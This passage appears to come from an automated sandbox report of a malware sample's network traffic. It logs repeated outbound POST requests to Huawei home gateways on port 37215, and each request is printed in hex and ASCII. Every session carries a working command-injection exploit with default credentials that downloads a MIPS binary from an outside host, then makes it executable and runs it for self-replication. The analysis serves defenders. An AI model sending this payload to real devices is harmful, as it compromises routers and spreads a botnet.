20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      84192.168.2.2334718197.89.108.6337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222207069 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      85192.168.2.2339796197.52.45.13237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222207069 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      86192.168.2.235473841.9.160.20537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222229004 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      87192.168.2.2352740149.227.100.10837215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222254038 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      88192.168.2.2334142197.5.25.537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222254038 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      89192.168.2.2347332197.146.199.16337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222279072 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      90192.168.2.2360150157.12.120.3737215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222279072 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      91192.168.2.233411041.81.198.3037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222279072 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      92192.168.2.2358602157.10.69.19637215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222279072 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      93192.168.2.2349446199.229.94.10937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222522974 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      94192.168.2.2336772182.102.31.22237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.223015070 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
